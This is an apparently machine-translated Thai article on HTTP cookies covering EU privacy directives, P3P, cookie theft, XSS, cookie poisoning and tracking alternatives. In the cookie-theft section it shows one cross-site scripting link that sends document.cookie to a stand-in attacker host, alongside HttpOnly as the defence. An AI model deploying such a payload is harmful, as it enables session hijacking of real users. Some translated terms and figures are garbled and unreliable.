Directive 202/58 ความเป็นส่วนตัวและการสื่อสารทางอิเล็กทรอนิกส์ มีกฎเกี่ยวกับการใช้คุกกี้ โดยเฉพาะอย่างยิ่ง ข้อ 5 วรรค 3 ของคำสั่งนี้กำหนดให้การจัดเก็บข้อมูล (เช่น คุกกี้) ในคอมพิวเตอร์ของผู้ใช้สามารถทำได้ก็ต่อเมื่อ:
- ผู้ใช้จะได้รับแจ้งถึงวิธีการใช้ข้อมูล
- ผู้ใช้จะได้รับตัวเลือกในการปฏิเสธการดำเนินการจัดเก็บนี้ อย่างไรก็ตาม บทความนี้ยังระบุว่าการจัดเก็บข้อมูลด้วยเหตุผลทางเทคนิคได้รับการยกเว้นจากกฎหมายนี้
เนื่องจากจะเริ่มใช้ตั้งแต่เดือนตุลาคม พ.ศ. 2003 อย่างไรก็ตาม คำสั่งดังกล่าวได้รับการปฏิบัติอย่างไม่สมบูรณ์ตามรายงานของเดือนธันวาคม พ.ศ. 2004 ซึ่งชี้ให้เห็นว่าประเทศสมาชิกบางประเทศ (สโลวาเกีย ลัตเวีย กรีซ เบลเยียม และลักเซมเบิร์ก) ยังไม่ได้เปลี่ยน คำสั่งเป็นกฎหมายภายในประเทศ
ตามความเห็นของ G29 ในปี 2010 คำสั่งนี้ซึ่งกำหนดเงื่อนไขการใช้คุกกี้เพื่อวัตถุประสงค์ในการโฆษณาตามพฤติกรรมอย่างชัดเจน โดยได้รับความยินยอมอย่างชัดแจ้งจากผู้ใช้อินเทอร์เน็ตยังคงมีผลใช้น้อยมาก ในความเป็นจริง ไซต์ส่วนใหญ่ทำในลักษณะที่ไม่เป็นไปตามคำสั่ง โดยจำกัดตัวเองไว้ที่ "แบนเนอร์" ธรรมดาๆ ที่แจ้งการใช้ "คุกกี้" โดยไม่ให้ข้อมูลเกี่ยวกับการใช้งาน โดยไม่แยกความแตกต่างระหว่างคุกกี้ "ทางเทคนิค" คุกกี้ "ติดตาม" หรือเสนอทางเลือกที่แท้จริงแก่ผู้ใช้ที่ต้องการรักษาคุกกี้ทางเทคนิค (เช่น คุกกี้การจัดการรถเข็นช็อปปิ้ง) และปฏิเสธคุกกี้ "ติดตาม" ในความเป็นจริง เว็บไซต์หลายแห่งทำงานไม่ถูกต้องหากคุกกี้ถูกปฏิเสธ ซึ่งไม่เป็นไปตามคำสั่ง 2002/58 หรือคำสั่ง 95/46 (การคุ้มครองข้อมูลส่วนบุคคล)
Directive 2009 / 136 / CE
เนื้อหานี้ได้รับการปรับปรุงโดย Directive 2009/136/EC ลงวันที่ 25 พฤศจิกายน 2009 ซึ่งระบุว่า "การจัดเก็บข้อมูลหรือการได้รับการเข้าถึงข้อมูลที่จัดเก็บไว้ในอุปกรณ์ปลายทางของสมาชิกหรือผู้ใช้จะได้รับอนุญาตก็ต่อเมื่อ สมาชิกหรือผู้ใช้ให้ความยินยอมหลังจากได้รับข้อมูลที่ชัดเจนและครบถ้วนตาม Directive 95/46/EC ระหว่างผู้อื่นตามวัตถุประสงค์ของการประมวลผล” คำสั่งใหม่นี้จึงเป็นการเพิ่มภาระผูกพันก่อนที่จะวางคุกกี้บนคอมพิวเตอร์ของผู้ใช้อินเทอร์เน็ต
ในการพิจารณาเบื้องต้นของคำสั่ง ผู้บัญญัติกฎหมายของยุโรประบุว่า: "หากเป็นไปได้ทางเทคนิคและมีประสิทธิภาพ ตามข้อกำหนดที่เกี่ยวข้องของ Directive 95/46/EC ความยินยอมของผู้ใช้เกี่ยวกับการประมวลผลอาจแสดงผ่านทาง การใช้การตั้งค่าที่เหมาะสมของเบราว์เซอร์หรือแอปพลิเคชันอื่นๆ” แต่ในความเป็นจริง ไม่มีเบราว์เซอร์ใดในปัจจุบันที่สามารถแยกคุกกี้ทางเทคนิคที่จำเป็นออกจากคุกกี้เสริม ซึ่งควรปล่อยให้ผู้ใช้เลือกเอง
คำสั่งใหม่นี้เปลี่ยนโดย ส.ส. เบลเยียมในเดือนกรกฎาคม 2012 การศึกษาในปี 2014 แสดงให้เห็นว่าแม้แต่ ส.ส. ยังต้องลำบากในการสมัคร ข้อจำกัดของคำสั่ง.
P3P
ข้อกำหนด P3P รวมถึงความสามารถของเซิร์ฟเวอร์ในการระบุนโยบายความเป็นส่วนตัว ซึ่งกำหนดประเภทของข้อมูลที่เก็บรวบรวมและเพื่อวัตถุประสงค์ใด นโยบายเหล่านี้รวมถึง (แต่ไม่จำกัดเพียง) การใช้ข้อมูลที่รวบรวมโดยใช้คุกกี้ ตามคำจำกัดความของ P3P เบราว์เซอร์สามารถยอมรับหรือปฏิเสธคุกกี้โดยการเปรียบเทียบนโยบายความเป็นส่วนตัวกับการตั้งค่าของผู้ใช้หรือโดยการถามผู้ใช้ โดยนำเสนอนโยบายความเป็นส่วนตัวที่ประกาศโดยเซิร์ฟเวอร์
เบราว์เซอร์จำนวนมาก รวมถึง Apple Safari และ Microsoft Internet Explorer เวอร์ชัน 6 และ 7 รองรับ P3P ซึ่งอนุญาตให้เบราว์เซอร์กำหนดว่าจะยอมรับการจัดเก็บคุกกี้ของบุคคลที่สามหรือไม่ เบราว์เซอร์ Opera อนุญาตให้ผู้ใช้ปฏิเสธคุกกี้ของบุคคลที่สามและสร้างโปรไฟล์ความปลอดภัยส่วนกลางและเฉพาะสำหรับโดเมนอินเทอร์เน็ต Mozilla Firefox เวอร์ชัน 2 เลิกสนับสนุน P3P แต่คืนสถานะในเวอร์ชัน 3
เบราว์เซอร์ส่วนใหญ่สามารถบล็อกคุกกี้ของบุคคลที่สามเพื่อเพิ่มความเป็นส่วนตัวและลดการติดตามโฆษณา โดยไม่ส่งผลเสียต่อประสบการณ์เว็บของผู้ใช้ เอเจนซี่โฆษณาหลายแห่งเสนอตัวเลือก เลือกออก โฆษณาที่ตรงเป้าหมาย โดยการตั้งค่าคุกกี้ทั่วไปในเบราว์เซอร์ซึ่งปิดใช้งานการกำหนดเป้าหมายนี้ แต่วิธีแก้ปัญหาดังกล่าวไม่มีประสิทธิภาพในทางปฏิบัติ เนื่องจากคุกกี้ทั่วไปนี้จะถูกลบทันทีที่ผู้ใช้ลบคุกกี้เหล่านี้ ซึ่งยกเลิกการเลือก ออกจากการตัดสินใจ
ข้อเสียของคุกกี้
นอกจากปัญหาความเป็นส่วนตัวแล้ว คุกกี้ยังมีข้อบกพร่องทางเทคนิคอีกด้วย โดยเฉพาะอย่างยิ่ง พวกเขาไม่ได้ระบุผู้ใช้อย่างถูกต้องเสมอไป พวกเขาสามารถชะลอประสิทธิภาพของไซต์เมื่อมีจำนวนมาก พวกเขาสามารถใช้สำหรับการโจมตีด้านความปลอดภัย และพวกเขาขัดแย้งกับการถ่ายโอนสถานะตัวแทน รูปแบบสถาปัตยกรรมของซอฟต์แวร์
การระบุที่ไม่ชัดเจน
หากใช้เบราว์เซอร์มากกว่าหนึ่งเบราว์เซอร์ในแต่ละเบราว์เซอร์จะมีหน่วยเก็บข้อมูลแยกต่างหากสำหรับคุกกี้เสมอ คุกกี้จึงไม่ระบุตัวบุคคล แต่เป็นการรวมบัญชีผู้ใช้ คอมพิวเตอร์ และเว็บเบราว์เซอร์เข้าด้วยกัน ดังนั้น ใครๆ ก็สามารถใช้บัญชี คอมพิวเตอร์ หรือเบราว์เซอร์เหล่านี้ที่มีคุกกี้จำนวนมากได้ ในทำนองเดียวกัน คุกกี้จะไม่แยกความแตกต่างระหว่างผู้ใช้หลายคนที่ใช้บัญชีผู้ใช้ คอมพิวเตอร์ และเบราว์เซอร์เดียวกัน เช่น ใน “อินเทอร์เน็ตคาเฟ่” หรือสถานที่ใดก็ตามที่ให้การเข้าถึงทรัพยากรคอมพิวเตอร์ได้ฟรี
แต่ในทางปฏิบัติแล้วข้อความนี้กลายเป็นเรื่องเข้าใจผิดในกรณีส่วนใหญ่เนื่องจากทุกวันนี้คอมพิวเตอร์ "ส่วนบุคคล" (หรือสมาร์ทโฟนหรือแท็บเล็ตซึ่งแย่กว่านั้น) ถูกใช้โดยบุคคลเดียวเป็นส่วนใหญ่ จำนวนนี้หมายถึงการกำหนดเป้าหมายบุคคลใดบุคคลหนึ่งและ ปริมาณข้อมูลที่รวบรวมมาถึงการกำหนดเป้าหมายส่วนบุคคลแม้ว่าบุคคลนั้นจะไม่ได้ระบุตัวตนก็ตาม
ขโมยคุกกี้
คอมพิวเตอร์เครื่องอื่นในเครือข่ายสามารถขโมยคุกกี้ได้
ระหว่างการทำงานปกติ คุกกี้จะถูกส่งกลับระหว่างเซิร์ฟเวอร์ (หรือกลุ่มเซิร์ฟเวอร์ในโดเมนเดียวกัน) และเบราว์เซอร์คอมพิวเตอร์ของผู้ใช้ เนื่องจากคุกกี้อาจมีข้อมูลที่ละเอียดอ่อน (ชื่อผู้ใช้ รหัสผ่านที่ใช้สำหรับการตรวจสอบสิทธิ์ ฯลฯ) ค่าของคุกกี้ไม่ควรเข้าถึงโดยคอมพิวเตอร์เครื่องอื่น การขโมยคุกกี้คือการสกัดกั้นคุกกี้โดยบุคคลที่สามที่ไม่ได้รับอนุญาต
คุกกี้สามารถถูกขโมยผ่านแพ็คเก็ต sniffer ในการโจมตีที่เรียกว่าการไฮแจ็กเซสชัน การรับส่งข้อมูลบนเน็ตสามารถดักจับและอ่านได้โดยคอมพิวเตอร์เครื่องอื่นนอกเหนือจากเครื่องส่งและรับ (โดยเฉพาะในพื้นที่ Wi-Fi สาธารณะที่ไม่ได้เข้ารหัส) การรับส่งข้อมูลนี้รวมถึงคุกกี้ที่ส่งผ่านเซสชันโดยใช้โปรโตคอล HTTP ธรรมดา เมื่อทราฟฟิกเครือข่ายไม่ได้เข้ารหัส ผู้ใช้ที่ประสงค์ร้ายจึงสามารถอ่านการสื่อสารของผู้ใช้รายอื่นบนเครือข่ายได้โดยใช้ "packet sniffers"
ปัญหานี้สามารถแก้ไขได้ด้วยการเข้ารหัสการเชื่อมต่อระหว่างคอมพิวเตอร์ของผู้ใช้กับเซิร์ฟเวอร์โดยใช้โปรโตคอล HTTPS เซิร์ฟเวอร์สามารถระบุ ธงที่ปลอดภัย ขณะตั้งค่าคุกกี้ เบราว์เซอร์จะส่งผ่านสายที่ปลอดภัยเท่านั้น เช่น การเชื่อมต่อ SSL
อย่างไรก็ตาม หลายๆ ไซต์ แม้ว่าจะใช้การสื่อสารที่เข้ารหัส HTTPS สำหรับการตรวจสอบผู้ใช้ (เช่น หน้าเข้าสู่ระบบ) แต่ภายหลังก็ส่งคุกกี้เซสชันและข้อมูลอื่นๆ ตามปกติ ผ่านการเชื่อมต่อ HTTP ที่ไม่ได้เข้ารหัสด้วยเหตุผลด้านประสิทธิภาพ ผู้โจมตีจึงสามารถสกัดกั้นคุกกี้ของผู้ใช้รายอื่นและแอบอ้างเป็นพวกเขาในเว็บไซต์ที่เหมาะสมหรือใช้ในการโจมตีคุกกี้
การเขียนสคริปต์ในไซต์: คุกกี้ที่ควรแลกเปลี่ยนระหว่างเซิร์ฟเวอร์และไคลเอนต์จะถูกส่งไปยังบุคคลที่สามรายอื่น
อีกวิธีในการขโมยคุกกี้คือไปที่ไซต์สคริปต์และให้เบราว์เซอร์ส่งคุกกี้ไปยังเซิร์ฟเวอร์ที่เป็นอันตรายซึ่งไม่เคยได้รับ เบราว์เซอร์สมัยใหม่อนุญาตให้เรียกใช้โค้ดบางส่วนที่ต้องการจากเซิร์ฟเวอร์ หากมีการเข้าถึงคุกกี้ระหว่างรันไทม์ ค่าของคุกกี้อาจถูกสื่อสารในบางรูปแบบไปยังเซิร์ฟเวอร์ที่ไม่ควรเข้าถึง การเข้ารหัสคุกกี้ก่อนที่จะส่งผ่านเครือข่ายไม่ได้ช่วยป้องกันการโจมตี
โดยทั่วไปแล้ว การเขียนสคริปต์ในไซต์ประเภทนี้จะใช้โดยผู้โจมตีบนไซต์ที่อนุญาตให้ผู้ใช้โพสต์เนื้อหา HTML ด้วยการรวมส่วนของรหัสที่เข้ากันได้ในการสนับสนุน HTML ผู้โจมตีสามารถรับคุกกี้จากผู้ใช้รายอื่นได้ สามารถใช้ความรู้เกี่ยวกับคุกกี้เหล่านี้ได้โดยเชื่อมต่อกับเว็บไซต์เดียวกันโดยใช้คุกกี้ที่ถูกขโมย ดังนั้นระบบจะจดจำได้ว่าเป็นผู้ใช้ที่ถูกขโมยคุกกี้
วิธีหนึ่งในการป้องกันการโจมตีดังกล่าวคือการใช้แฟล็ก HttpOnly เป็นตัวเลือกที่เปิดตัวตั้งแต่เวอร์ชัน 6 ของ Internet Explorer ใน PHP ตั้งแต่เวอร์ชัน 5.2.0 ซึ่งมีการวางแผนให้ไคลเอ็นต์ไม่สามารถเข้าถึงคุกกี้ได้ใกล้กับสคริปต์ อย่างไรก็ตาม นักพัฒนาเว็บควรคำนึงถึงสิ่งนี้ในการพัฒนาไซต์ของตน เพื่อให้พวกเขาปลอดภัยต่อการเขียนสคริปต์ในไซต์
ภัยคุกคามด้านความปลอดภัยอื่นที่ใช้คือการสร้างความต้องการในไซต์
ข้อกำหนดทางเทคนิคอย่างเป็นทางการอนุญาตให้ส่งคุกกี้กลับไปยังเซิร์ฟเวอร์ในโดเมนที่เป็นต้นกำเนิดเท่านั้น อย่างไรก็ตาม ค่าของคุกกี้สามารถส่งไปยังเซิร์ฟเวอร์อื่นโดยใช้วิธีการอื่นที่ไม่ใช่ส่วนหัวของคุกกี้
โดยเฉพาะอย่างยิ่ง ภาษาสคริปต์เช่น JavaScript โดยทั่วไปจะได้รับอนุญาตให้เข้าถึงค่าคุกกี้และสามารถส่งค่าโดยพลการไปยังเซิร์ฟเวอร์ใด ๆ บนอินเทอร์เน็ต ความสามารถในการเขียนสคริปต์นี้ใช้จากเว็บไซต์ที่อนุญาตให้ผู้ใช้โพสต์เนื้อหา HTML เพื่อให้ผู้ใช้รายอื่นดูได้
ตัวอย่างเช่น ผู้โจมตีที่ทำงานบนโดเมน example.com อาจโพสต์ความคิดเห็นที่มีลิงก์ต่อไปนี้ซึ่งชี้ไปยังบล็อกยอดนิยมที่พวกเขาไม่ได้ควบคุม:
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
เมื่อผู้ใช้รายอื่นคลิกลิงก์นี้ เบราว์เซอร์จะดำเนินการส่วนแอตทริบิวต์ onclick ของโค้ด ดังนั้นจะแทนที่สตริง document.cookie ด้วยรายการคุกกี้ของผู้ใช้ที่ใช้งานสำหรับหน้านี้ ดังนั้น รายการคุกกี้นี้จึงถูกส่งไปยังเซิร์ฟเวอร์ example.com และผู้โจมตีจึงสามารถรวบรวมคุกกี้ของผู้ใช้รายนี้ได้
การโจมตีประเภทนี้ตรวจพบได้ยากในฝั่งผู้ใช้ เนื่องจากสคริปต์มาจากโดเมนเดียวกับที่ตั้งค่าคุกกี้ และการดำเนินการเพื่อส่งค่าดูเหมือนจะได้รับอนุญาตจากโดเมนนั้น ถือว่าเป็นความรับผิดชอบของผู้ดูแลระบบที่ดำเนินการไซต์ประเภทนี้ในการวางข้อจำกัดเพื่อป้องกันการเผยแพร่โค้ดที่เป็นอันตราย
คุกกี้ไม่สามารถมองเห็นได้โดยตรงในโปรแกรมฝั่งไคลเอนต์ เช่น JavaScript หากคุกกี้นั้นถูกส่งด้วยแฟล็ก HttpOnly จากมุมมองของเซิร์ฟเวอร์ ข้อแตกต่างเพียงอย่างเดียวคือในบรรทัดของส่วนหัว Set-Cookie มีการเพิ่มฟิลด์ใหม่ที่มีสตริง HttpOnly:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
เมื่อเบราว์เซอร์ได้รับคุกกี้ดังกล่าว ควรใช้คุกกี้ตามปกติในการแลกเปลี่ยน HTTP ต่อไปนี้ แต่จะไม่แสดงให้สคริปต์ที่ทำงานบนฝั่งไคลเอ็นต์มองเห็นได้ แฟล็ก HttpOnly ไม่ได้เป็นส่วนหนึ่งของข้อกำหนดทางเทคนิคอย่างเป็นทางการใดๆ และไม่ได้ใช้งานในเบราว์เซอร์ทั้งหมด โปรดทราบว่าขณะนี้ยังไม่มีวิธีป้องกันการอ่านและเขียนคุกกี้เซสชันด้วยวิธี XMLHTTPRequest
การแก้ไขเนื้อหา: ผู้โจมตีส่งคุกกี้ที่ไม่ถูกต้องไปยังเซิร์ฟเวอร์ ซึ่งอาจทำจากคุกกี้ที่ถูกต้องที่เซิร์ฟเวอร์ส่งมา
การเปลี่ยนคุกกี้
ทันทีที่คุกกี้จำเป็นต้องจัดเก็บและส่งคืนไปยังเซิร์ฟเวอร์โดยไม่มีการเปลี่ยนแปลง ผู้โจมตีสามารถแก้ไขค่าของคุกกี้ก่อนที่จะส่งกลับไปยังเซิร์ฟเวอร์ ตัวอย่างเช่น หากคุกกี้มีมูลค่ารวมที่ผู้ใช้ต้องจ่ายสำหรับสินค้าที่วางในตะกร้าสินค้าของร้านค้า การเปลี่ยนแปลงค่านี้จะทำให้เซิร์ฟเวอร์เสี่ยงต่อการเรียกเก็บเงินจากผู้โจมตีน้อยกว่าราคาเริ่มต้น กระบวนการแก้ไขค่าของคุกกี้เรียกว่า พิษคุกกี้ และสามารถใช้หลังจากการขโมยคุกกี้เพื่อทำให้การโจมตีเป็นไปอย่างต่อเนื่อง
ในวิธีการแทนที่คุกกี้ ผู้โจมตีใช้ประโยชน์จากความผิดพลาดของเบราว์เซอร์เพื่อส่งคุกกี้ที่ไม่ถูกต้องไปยังเซิร์ฟเวอร์
อย่างไรก็ตาม เว็บไซต์ส่วนใหญ่จัดเก็บเฉพาะ ID เซสชัน — ซึ่งเป็นหมายเลขเฉพาะที่สร้างขึ้นแบบสุ่มซึ่งใช้เพื่อระบุผู้ใช้เซสชัน — ในคุกกี้เอง ในขณะที่ข้อมูลอื่น ๆ ทั้งหมดจะถูกจัดเก็บไว้ในเซิร์ฟเวอร์ ในกรณีนี้ ปัญหานี้ได้รับการแก้ไขเป็นส่วนใหญ่
การจัดการคุกกี้ระหว่างเว็บไซต์
แต่ละไซต์ต้องมีคุกกี้ของตัวเอง ดังนั้นไซต์หนึ่งจึงไม่สามารถแก้ไขหรือสร้างคุกกี้ที่เกี่ยวข้องกับอีกไซต์หนึ่งได้ ข้อบกพร่องด้านความปลอดภัยของเว็บเบราว์เซอร์อาจทำให้ไซต์ที่เป็นอันตรายสามารถละเมิดกฎนี้ได้ การใช้ประโยชน์จากข้อบกพร่องดังกล่าวมักเรียกกันว่า การทำอาหารข้ามไซต์. จุดประสงค์ของการโจมตีดังกล่าวอาจเป็นการขโมยรหัสเซสชัน
ผู้ใช้ควรใช้เว็บเบราว์เซอร์เวอร์ชันล่าสุดซึ่งช่องโหว่เหล่านี้จะถูกกำจัดออกไป
สถานะที่ขัดแย้งระหว่างไคลเอ็นต์และเซิร์ฟเวอร์
การใช้คุกกี้อาจทำให้เกิดความขัดแย้งระหว่างสถานะของลูกค้าและสถานะที่จัดเก็บไว้ในคุกกี้ หากผู้ใช้ได้รับคุกกี้และคลิกที่ปุ่ม "ย้อนกลับ" ของเบราว์เซอร์ สถานะของเบราว์เซอร์โดยทั่วไปจะไม่เหมือนกับก่อนที่จะได้มานี้ ตัวอย่างเช่น หากตะกร้าสินค้าของร้านค้าออนไลน์ถูกสร้างขึ้นโดยใช้คุกกี้ เนื้อหาของตะกร้าสินค้าจะไม่สามารถเปลี่ยนแปลงได้เมื่อผู้ใช้กลับไปที่ประวัติเบราว์เซอร์: หากผู้ใช้กดปุ่มเพื่อเพิ่มบทความในตะกร้าและคลิกที่ "ส่งคืน " ปุ่ม บทความยังคงอยู่ในบทความนี้ นี่อาจไม่ใช่ความตั้งใจของผู้ใช้ที่ต้องการยกเลิกการเพิ่มบทความอย่างแน่นอน สิ่งนี้สามารถนำไปสู่ความไม่น่าเชื่อถือ ความสับสน และจุดบกพร่อง ดังนั้นนักพัฒนาเว็บควรตระหนักถึงปัญหานี้และดำเนินมาตรการเพื่อจัดการกับสถานการณ์เช่นนี้
คุกกี้หมดอายุ
คุกกี้ถาวรได้รับการวิพากษ์วิจารณ์จากผู้เชี่ยวชาญด้านความปลอดภัยความเป็นส่วนตัวเนื่องจากไม่ได้รับการตั้งค่าให้หมดอายุเร็วพอ ทำให้เว็บไซต์สามารถติดตามผู้ใช้และสร้างโปรไฟล์ของพวกเขาเมื่อเวลาผ่านไป ลักษณะนี้ของคุกกี้เป็นส่วนหนึ่งของปัญหาการไฮแจ็กเซสชัน เนื่องจากคุกกี้ถาวรที่ถูกขโมยสามารถใช้เพื่อปลอมตัวเป็นผู้ใช้ในช่วงเวลาหนึ่ง
อ่าน: กาฟาม: พวกเขาเป็นใคร? ทำไมพวกเขา (บางครั้ง) น่ากลัวจัง?
ทางเลือกแทนคุกกี้
การดำเนินการบางอย่างที่สามารถดำเนินการโดยใช้คุกกี้สามารถดำเนินการโดยใช้กลไกอื่นที่ข้ามคุกกี้หรือสร้างคุกกี้ที่ถูกลบขึ้นมาใหม่ ซึ่งสร้างปัญหาความเป็นส่วนตัวในลักษณะเดียวกัน (หรือบางครั้งแย่กว่านั้นเพราะมองไม่เห็น) มากกว่าคุกกี้..
ที่อยู่ IP
ผู้ใช้สามารถติดตามได้ด้วยที่อยู่ IP ของคอมพิวเตอร์ที่เรียกเพจ เทคนิคนี้ใช้ได้ตั้งแต่การเปิดตัวของเวิลด์ไวด์เว็บ เมื่อมีการดาวน์โหลดหน้าเว็บ เซิร์ฟเวอร์จะร้องขอที่อยู่ IP ของคอมพิวเตอร์ที่ใช้งานเบราว์เซอร์หรือพร็อกซี หากไม่มีการใช้ เซิร์ฟเวอร์สามารถติดตามข้อมูลนี้ว่ามีการใช้งานคุกกี้หรือไม่ อย่างไรก็ตาม ที่อยู่เหล่านี้มักมีความน่าเชื่อถือในการระบุผู้ใช้น้อยกว่าคุกกี้ เนื่องจากคอมพิวเตอร์และพร็อกซีอาจถูกแชร์โดยผู้ใช้หลายคน และคอมพิวเตอร์เครื่องเดียวกันอาจได้รับที่อยู่ IP ที่แตกต่างกันในแต่ละเซสชันการทำงาน (เช่น กรณีการเชื่อมต่อโทรศัพท์) .
การติดตามตามที่อยู่ IP สามารถเชื่อถือได้ในบางสถานการณ์ เช่น การเชื่อมต่อบรอดแบนด์ที่รักษาที่อยู่ IP เดิมไว้เป็นเวลานาน ตราบเท่าที่เปิดเครื่องอยู่
บางระบบเช่น Tor ได้รับการออกแบบมาเพื่อรักษาความเป็นนิรนามของอินเทอร์เน็ต และทำให้การติดตามด้วยที่อยู่ IP เป็นไปไม่ได้หรือไม่สามารถทำได้
URL
เทคนิคที่แม่นยำยิ่งขึ้นนั้นขึ้นอยู่กับการฝังข้อมูลใน URL ส่วนสตริงข้อความค้นหาของ URL เป็นเทคนิคหนึ่งที่โดยทั่วไปจะใช้เพื่อจุดประสงค์นี้ แต่ส่วนอื่นๆ ก็สามารถใช้ได้เช่นกัน ทั้ง Java serverlet และกลไกเซสชัน PHP ใช้วิธีนี้หากไม่ได้เปิดใช้งานคุกกี้
วิธีนี้เกี่ยวข้องกับการต่อท้ายคำขอสตริงของเว็บเซิร์ฟเวอร์กับลิงก์ของหน้าเว็บที่ดำเนินการเมื่อส่งไปยังเบราว์เซอร์ เมื่อผู้ใช้ไปตามลิงก์ เบราว์เซอร์จะส่งคืนสตริงข้อความค้นหาที่แนบมากับเซิร์ฟเวอร์
สตริงข้อความค้นหาที่ใช้เพื่อจุดประสงค์นี้และคุกกี้มีความคล้ายคลึงกันมาก โดยเป็นข้อมูลที่เซิร์ฟเวอร์เลือกโดยพลการและส่งคืนโดยเบราว์เซอร์ อย่างไรก็ตาม มีความแตกต่างบางประการ: เมื่อใช้ URL ที่มีสตริงข้อความค้นหาซ้ำ ข้อมูลเดียวกันจะถูกส่งไปยังเซิร์ฟเวอร์ ตัวอย่างเช่น หากค่ากำหนดของผู้ใช้ถูกเข้ารหัสในสตริงข้อความค้นหาของ URL และผู้ใช้ส่ง URL นั้นไปยังผู้ใช้รายอื่นทางอีเมล ผู้ใช้นั้นจะสามารถใช้ค่ากำหนดเหล่านั้นได้ด้วย
ในทางกลับกัน เมื่อผู้ใช้เข้าถึงหน้าเดียวกันสองครั้ง จะไม่มีการรับประกันว่าจะใช้สตริงข้อความค้นหาเดียวกันทั้งสองครั้ง ตัวอย่างเช่น หากผู้ใช้เข้าสู่หน้าหนึ่งจากหน้าเว็บไซต์ภายในในครั้งแรกและเข้าสู่หน้าเดียวกันจากหน้าภายนอกในครั้งที่สอง สตริงข้อความค้นหาที่เกี่ยวข้องกับหน้าเว็บไซต์โดยทั่วไปจะแตกต่างกัน ในขณะที่คุกกี้จะเหมือนกัน .
ข้อเสียอื่นๆ ของสตริงการสืบค้นเกี่ยวข้องกับความปลอดภัย: การเก็บข้อมูลที่ระบุเซสชันในสตริงการสืบค้นจะเปิดใช้งานหรือลดความซับซ้อนของการโจมตีการตรึงเซสชัน การโจมตีการอ้างอิงตัวระบุ และการหาประโยชน์อื่นๆ การส่งรหัสเซสชันเป็นคุกกี้ HTTP จะปลอดภัยกว่า
ฟิลด์แบบฟอร์มที่ซ่อนอยู่
การติดตามเซสชันรูปแบบหนึ่งที่ใช้โดย ASP.NET คือการใช้เว็บฟอร์มที่มีฟิลด์ที่ซ่อนอยู่ เทคนิคนี้คล้ายกับการใช้สตริงการสืบค้น URL เพื่อส่งข้อมูล และมีข้อดีและข้อเสียเหมือนกัน และถ้าแบบฟอร์มได้รับการประมวลผลด้วยวิธี HTTP GET ฟิลด์จะกลายเป็นส่วนหนึ่งของ URL ของเบราว์เซอร์ที่จะส่งเมื่อส่งแบบฟอร์ม แต่แบบฟอร์มส่วนใหญ่จะประมวลผลด้วย HTTP POST ซึ่งทำให้ข้อมูลในแบบฟอร์ม รวมถึงฟิลด์ที่ซ่อนอยู่ ถูกเพิ่มเป็นอินพุตเพิ่มเติมที่ไม่ใช่ส่วนหนึ่งของ URL หรือคุกกี้
วิธีนี้มีข้อดีสองประการจากมุมมองการติดตาม ประการแรก การติดตามข้อมูลที่อยู่ในซอร์สโค้ด HTML และอินพุต POST แทนที่จะเป็น URL จะทำให้ผู้ใช้ทั่วไปสามารถหลีกเลี่ยงการติดตามนี้ได้ ประการที่สอง ข้อมูลเซสชันจะไม่ถูกคัดลอกเมื่อผู้ใช้คัดลอก URL (เพื่อบันทึกหน้าลงดิสก์หรือส่งทางอีเมล เป็นต้น)
หน้าต่าง.ชื่อ
เว็บเบราว์เซอร์ทั่วไปทั้งหมดสามารถจัดเก็บข้อมูลจำนวนมาก (2MB ถึง 32MB) ผ่าน JavaScript โดยใช้คุณสมบัติ window.name ของ DOM ข้อมูลนี้สามารถใช้แทนคุกกี้เซสชันและยังใช้ข้ามโดเมนได้อีกด้วย เทคนิคนี้สามารถใช้ร่วมกับออบเจกต์ JSON เพื่อจัดเก็บชุดตัวแปรเซสชันฝั่งไคลเอ็นต์ที่ซับซ้อน
ข้อเสียคือแต่ละหน้าต่างหรือแท็บที่แยกจากกันในตอนแรกจะมี window.name ว่างอยู่ เมื่อเรียกดูตามแท็บ (เปิดโดยผู้ใช้) หมายความว่าแท็บที่เปิดทีละรายการจะไม่มีชื่อหน้าต่าง นอกจากนี้ยังสามารถใช้ window.name เพื่อติดตามผู้เยี่ยมชมในเว็บไซต์ต่างๆ ซึ่งอาจก่อให้เกิดปัญหาความเป็นส่วนตัวได้
ในบางแง่ วิธีนี้อาจมีความปลอดภัยมากกว่าคุกกี้ เนื่องจากเซิร์ฟเวอร์ไม่มีส่วนเกี่ยวข้อง ดังนั้นจึงทำให้ไม่ปลอดภัยต่อการโจมตีเครือข่ายของคุกกี้ดมกลิ่น อย่างไรก็ตาม หากมีการใช้มาตรการพิเศษในการปกป้องข้อมูล ข้อมูลดังกล่าวจะเสี่ยงต่อการถูกโจมตีเพิ่มเติม เนื่องจากข้อมูลจะพร้อมใช้งานผ่านไซต์อื่นที่เปิดในหน้าต่างเดียวกัน
การตรวจสอบสิทธิ์ HTTP
โปรโตคอล HTTP ประกอบด้วยโปรโตคอลการตรวจสอบการเข้าถึงพื้นฐานและสรุปการตรวจสอบการเข้าถึงซึ่งอนุญาตให้เข้าถึงหน้าเว็บได้เฉพาะเมื่อผู้ใช้ให้ชื่อผู้ใช้และรหัสผ่านที่ถูกต้อง หากเซิร์ฟเวอร์ขอใบรับรองเพื่ออนุญาตการเข้าถึงหน้าเว็บ เบราว์เซอร์จะขอใบรับรองจากผู้ใช้ และเมื่อได้รับแล้ว เบราว์เซอร์จะจัดเก็บและส่งไปยังคำขอ HTTP ที่ตามมาทั้งหมด ข้อมูลนี้สามารถใช้เพื่อติดตามผู้ใช้
วัตถุที่ใช้ร่วมกันในเครื่อง
หากเบราว์เซอร์มีปลั๊กอิน Adobe Flash Player แสดงว่า วัตถุที่ใช้ร่วมกันในเครื่อง สามารถใช้เพื่อวัตถุประสงค์เดียวกับคุกกี้ อาจเป็นตัวเลือกที่น่าสนใจสำหรับนักพัฒนาเว็บเนื่องจาก:
- ขีดจำกัดขนาดเริ่มต้นสำหรับวัตถุที่ใช้ร่วมกันในเครื่องคือ 100 KB
- การตรวจสอบความปลอดภัยจะแยกจากการตรวจสอบคุกกี้ของผู้ใช้ (ดังนั้นวัตถุที่ใช้ร่วมกันในเครื่องจึงได้รับอนุญาตเมื่อไม่มีคุกกี้)
